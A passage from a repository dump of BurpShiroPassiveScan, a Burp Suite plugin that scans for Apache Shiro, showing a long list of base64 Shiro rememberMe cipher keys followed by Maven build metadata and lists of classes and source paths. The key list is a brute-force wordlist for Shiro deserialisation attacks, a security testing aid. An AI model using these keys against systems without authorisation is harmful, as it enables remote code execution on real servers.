"Bf7MfkNR0axGGptozrebag==" 285 | - "1tC/xrDYs8ey+sa3emtiYw==" 286 | - "ZmFsYWRvLnh5ei5zaGlybw==" 287 | - "cGhyYWNrY3RmREUhfiMkZA==" 288 | - "IduElDUpDDXE677ZkhhKnQ==" 289 | - "yeAAo1E8BOeAYfBlm4NG9Q==" 290 | - "cGljYXMAAAAAAAAAAAAAAA==" 291 | - "2itfW92XazYRi5ltW0M2yA==" 292 | - "XgGkgqGqYrix9lI6vxcrRw==" 293 | - "ertVhmFLUs0KTA3Kprsdag==" 294 | - "5AvVhmFLUS0ATA4Kprsdag==" 295 | - "s0KTA3mFLUprK4AvVhsdag==" 296 | - "hBlzKg78ajaZuTE0VLzDDg==" 297 | - "9FvVhtFLUs0KnA3Kprsdyg==" 298 | - "d2ViUmVtZW1iZXJNZUtleQ==" 299 | - "yNeUgSzL/CfiWw1GALg6Ag==" 300 | - "NGk/3cQ6F5/UNPRh8LpMIg==" 301 | - "4BvVhmFLUs0KTA3Kprsdag==" 302 | - "MzVeSkYyWTI2OFVLZjRzZg==" 303 | - "CrownKey==a12d/dakdad" 304 | - "empodDEyMwAAAAAAAAAAAA==" 305 | - "A7UzJgh1+EWj5oBFi+mSgw==" 306 | - "c2hpcm9fYmF0aXMzMgAAAA==" 307 | - "i45FVt72K2kLgvFrJtoZRw==" 308 | - "66v1O8keKNV3TTcGPK1wzg==" 309 | - "U3BAbW5nQmxhZGUAAAAAAA==" 310 | - "ZnJlc2h6Y24xMjM0NTY3OA==" 311 | - "Jt3C93kMR9D5e8QzwfsiMw==" 312 | - "MTIzNDU2NzgxMjM0NTY3OA==" 313 | - "vXP33AonIp9bFwGl7aT7rA==" 314 | - "V2hhdCBUaGUgSGVsbAAAAA==" 315 | - "Q01TX0JGTFlLRVlfMjAxOQ==" 316 | - "Is9zJ3pzNh2cgTHB4ua3+Q==" 317 | - "SDKOLKn2J1j/2BHjeZwAoQ==" 318 | - "NsZXjXVklWPZwOfkvk6kUA==" 319 | - "GAevYnznvgNCURavBhCr1w==" 320 | - "zSyK5Kp6PZAAjlT+eeNMlg==" 321 | - "bXdrXl9eNjY2KjA3Z2otPQ==" 322 | - "RVZBTk5JR0hUTFlfV0FPVQ==" 323 | - "WkhBTkdYSUFPSEVJX0NBVA==" 324 | - "GsHaWo4m1eNbE0kNSMULhg==" 325 | - "l8cc6d2xpkT1yFtLIcLHCg==" 326 | - "KU471rVNQ6k7PQL4SqxgJg==" 327 | - "kPH+bIxk5D2deZiIxcabaA==" 328 | - "kPH+bIxk5D2deZiIxcacaA==" 329 | - "4AvVhdsgUs0F563SDFAdag==" 330 | - "FL9HL9Yu5bVUJ0PDU1ySvg==" 331 | - "fdCEiK9YvLC668sS43CJ6A==" 332 | - "FJoQCiz0z5XWz2N2LyxNww==" 333 | - "HeUZ/LvgkO7nsa18ZyVxWQ==" 334 | - "HoTP07fJPKIRLOWoVXmv+Q==" 335 | - "iycgIIyCatQofd0XXxbzEg==" 336 | - "m0/5ZZ9L4jjQXn7MREr/bw==" 337 | - "NoIw91X9GSiCrLCF03ZGZw==" 338 | - "oPH+bIxk5E2enZiIxcqaaA==" 339 | - "QAk0rp8sG0uJC4Ke2baYNA==" 340 | - "Rb5RN+LofDWJlzWAwsXzxg==" 341 | - 
"s2SE9y32PvLeYo+VGFpcKA==" 342 | - "SrpFBcVD89eTQ2icOD0TMg==" 343 | - "Us0KvVhTeasAm43KFLAeng==" 344 | - "YWJjZGRjYmFhYmNkZGNiYQ==" 345 | - "zIiHplamyXlVB11UXWol8g==" 346 | - "ZjQyMTJiNTJhZGZmYjFjMQ==" 347 | - "2adsfasdqerqerqewradsf==" 348 | - "2AvVCXsxUs0FSA7SYFjdQg==" 349 | - "2AvVhdsgERdsSA3SDFAdag==" 350 | - "2AvVhdsgUs0FSA3SaFAdfg==" 351 | - "2AvVhdsgUs0FSA3SDFAder==" 352 | - "2AvVhdsgUsOFSA3SDFAdag==" 353 | - "2AvVhmFLUs0KTA3Kprsdag==" 354 | - "2AvVidsaUSofSA3SDFAdog==" 355 | - "3Av2hmFLAs0BTA3Kprsd6E==" 356 | - "3AvVhdAgUs1FSA4SDFAdBg==" 357 | - "3AvVhMFLIs0KTA3Kprsdag==" 358 | - "3AvVhmFLUs0KTA3KaTHGFg==" 359 | - "3qDVdLawoIr1xFd6ietnsg==" 360 | - "3rvVhmFLUs0KAT3Kprsdag==" 361 | - "4AvVhm2LUs0KTA3Kprsdag==" 362 | - "4AvVhmFLUs0KTA3KAAAAAA==" 363 | - "4AvVhmFLUs0KTA3Kprseaf==" 364 | - "4AvVhmFLUs0TTA3Kprsdag==" 365 | - "4AvVhmFLUs5KTA1Kprsdag==" 366 | - "4AvVhmFLUsOKTA3Kprsdag==" 367 | - "4rvVhmFLUs0KAT3Kprsdag==" 368 | - "4WCZSJyqdUQsije93aQIRg==" 369 | - "5AvVhCsgUs0FSA3SDFAdag==" 370 | - "5oiR5piv5p2h5ZK46bG8IQ==" 371 | - "8AvVhdsgUs0FSA3SDFAdag==" 372 | - "9Ami6v2G5Y+r5aPnE4OlBB==" 373 | - "9AVvhnFLuS3KTV8KprsdAg==" 374 | - "AF05JAuyuEB1ouJQ9Y9Phg==" 375 | - "aG91c2Vob3VzZWhvdXNlMg==" 376 | - "A+kWR7o9O0/G/W6aOGesRA==" 377 | - "AztiX2RUqhc7dhOzl1Mj8Q==" 378 | - "b2EAAAAAAAAAAAAAAAAAAA==" 379 | - "B9rPF8FHhxKJZ9k63ik7kQ==" 380 | - "c2hvdWtlLXBsdXMuMjAxNg==" 381 | - "Cj6LnKZNLEowAZrdqyH/Ew==" 382 | - "duhfin37x6chw29jsne45m==" 383 | - "fCq+/xW488hMTCE+cmJ3FF==" 384 | - "FjbNm1avvGmWE9CY2HqV75==" 385 | - "GhrF5zLfq1Dtadd1jlohhA==" 386 | - "GHxH6G3LFh8Zb3NwoRgfFA==" 387 | - "HOlg7NHb9potm0n5s4ic0Q==" 388 | - "lt181dcQVz/Bo9Wb8ws/Cg==" 389 | - "M2djA70UBBUPDibGZBRvrA==" 390 | - "mIccZhQt6EBHrZIyw1FAXQ==" 391 | - "pbnA+Qzen1vjV3rNqQBLHg==" 392 | - "pyyX1c5x2f0LZZ7VKZXjKO==" 393 | - "QDFCnfkLUs0KTA3Kprsdag==" 394 | - "QF5HMyZAWDZYRyFnSGhTdQ==" 395 | - "qQFtSnnj/sx7vu51ixAyEQ==" 396 | - "QUxQSEFNWVNPRlRCVUlMRA==" 397 | - "QVN1bm5uJ3MgU3Vuc2l0ZQ==" 398 | - 
"R29yZG9uV2ViAAAAAAAAAA==" 399 | - "sBv2t3okbdm3U0r2EVcSzB==" 400 | - "sgIQrqUVxa1OZRRIK3hLZw==" 401 | - "TGMPe7lGO/Gbr38QiJu1/w==" 402 | - "w793pPq5ZVBKkj8OhV4KaQ==" 403 | - "wrjUh2ttBPQLnT4JVhriug==" 404 | - "wyLZMDifwq3sW1vhhHpgKA==" 405 | - "YnlhdnMAAAAAAAAAAAAAAA==" 406 | - "YVd4dmRtVjViM1UlM0QIdn==" 407 | - "YWdlbnRAZG1AMjAxOHN3Zg==" 408 | - "YystomRZLMUjiK0Q1+LFdw==" 409 | - "Z3VucwAAAAAAAAAAAAABBB==" 410 | - "Z3VucwACAOVAKALACAADSA==" -------------------------------------------------------------------------------- /target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | #Generated by Maven 2 | #Fri Sep 02 21:48:36 CST 2022 3 | groupId=com.github.pmiaowu 4 | artifactId=BurpShiroPassiveScan 5 | version=2.0.0 6 | -------------------------------------------------------------------------------- /target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | burp\Application\ShiroCipherKeyExtension\ExtensionInterface\AShiroCipherKeyExtension.class 2 | burp\Ui\Tags.class 3 | burp\Encrypt.class 4 | burp\Bootstrap\Encrypt\GcmEncrypt.class 5 | burp\Application\ShiroCipherKeyExtension\ShiroCipherKey.class 6 | burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint2.class 7 | burp\Menu$2.class 8 | burp\CustomErrorException\TaskTimeoutException.class 9 | burp\Menu$7.class 10 | burp\Utils$SilentURLStreamHandler.class 11 | burp\Bootstrap\CustomBurpUrl.class 12 | burp\CustomScanIssue.class 13 | burp\Menu$4.class 14 | burp\Bootstrap\DiffPage.class 15 | burp\Bootstrap\YamlReader.class 16 | burp\Application\ShiroCipherKeyExtension\ShiroCipherKeyThread.class 17 | burp\Bootstrap\Encrypt\CbcEncrypt.class 18 | burp\ConfigDlg.class 19 | burp\Ui\ScanQueueTag$TablesData.class 20 | burp\Menu$1.class 21 | burp\Menu$6.class 22 | burp\Bootstrap\GlobalVariableReader.class 23 | 
burp\BurpExtender.class 24 | burp\Menu.class 25 | burp\Bootstrap\Encrypt\EncryptInterface.class 26 | burp\Application\ShiroFingerprintExtension\ExtensionInterface\IShiroFingerprintExtension.class 27 | burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint1.class 28 | burp\Application\ShiroCipherKeyExtension\ExtensionInterface\IShiroCipherKeyExtension.class 29 | burp\Application\ShiroFingerprintExtension\ExtensionInterface\AShiroFingerprintExtension.class 30 | burp\ConfigDlg$1.class 31 | burp\Application\ShiroFingerprintExtension\ShiroFingerprint.class 32 | burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint3.class 33 | burp\Bootstrap\CustomBurpHelpers.class 34 | burp\Menu$3.class 35 | burp\Ui\ScanQueueTag$URLTable.class 36 | burp\Ui\ScanQueueTag.class 37 | burp\Utils.class 38 | burp\Bootstrap\GlobalPassiveScanVariableReader.class 39 | burp\Application\ShiroCipherKeyExtension\ExtensionMethod\ShiroCipherKeyScan.class 40 | burp\Config.class 41 | burp\Bootstrap\CustomHelpers.class 42 | burp\CustomErrorException\DiffPageException.class 43 | burp\Menu$5.class 44 | burp\Ui\BaseSettingTag.class 45 | -------------------------------------------------------------------------------- /target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst: -------------------------------------------------------------------------------- 1 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\CustomScanIssue.java 2 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\CustomErrorException\DiffPageException.java 3 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroCipherKeyExtension\ExtensionInterface\AShiroCipherKeyExtension.java 4 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\Encrypt\EncryptInterface.java 5 | 
C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ExtensionInterface\IShiroFingerprintExtension.java 6 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroCipherKeyExtension\ShiroCipherKey.java 7 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ShiroFingerprint.java 8 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint3.java 9 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\DiffPage.java 10 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\CustomHelpers.java 11 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Utils.java 12 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\CustomBurpHelpers.java 13 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\GlobalPassiveScanVariableReader.java 14 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Menu.java 15 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Ui\BaseSettingTag.java 16 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroCipherKeyExtension\ShiroCipherKeyThread.java 17 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint1.java 18 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\BurpExtender.java 19 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Ui\Tags.java 20 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\Encrypt\CbcEncrypt.java 21 | 
C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroCipherKeyExtension\ExtensionMethod\ShiroCipherKeyScan.java 22 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Encrypt.java 23 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Config.java 24 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Ui\ScanQueueTag.java 25 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ExtensionMethod\ShiroFingerprint2.java 26 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\ConfigDlg.java 27 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\Encrypt\GcmEncrypt.java 28 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\YamlReader.java 29 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\GlobalVariableReader.java 30 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroFingerprintExtension\ExtensionInterface\AShiroFingerprintExtension.java 31 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Application\ShiroCipherKeyExtension\ExtensionInterface\IShiroCipherKeyExtension.java 32 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\Bootstrap\CustomBurpUrl.java 33 | C:\Users\chenjunqing\Desktop\BurpShiroPassiveScan-master\src\main\java\burp\CustomErrorException\TaskTimeoutException.java 34 | --------------------------------------------------------------------------------